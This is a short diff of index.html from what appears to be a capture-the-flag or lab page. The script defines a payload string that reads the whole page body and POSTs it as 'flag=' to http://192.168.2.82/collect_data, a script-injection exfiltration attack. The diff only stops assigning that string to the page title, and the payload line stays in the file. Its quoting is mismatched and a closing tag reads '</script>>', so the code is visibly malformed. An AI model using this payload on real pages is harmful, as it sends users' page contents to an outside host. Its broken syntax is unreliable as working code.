--- a/index.html
+++ b/index.html
@@ -5,7 +5,7 @@
    	<script >
 
    		var script_title="<script> var data=document.body.innerHTML; var xhr = new XMLHttpRequest(); xhr.open(\"POST", "http://192.168.2.82/collect_data\",true); xhr.send(\"flag=\"+data) </script>";
-   		document.title=script_title;
+   		document.title="happy";
 
 
    	</script>>
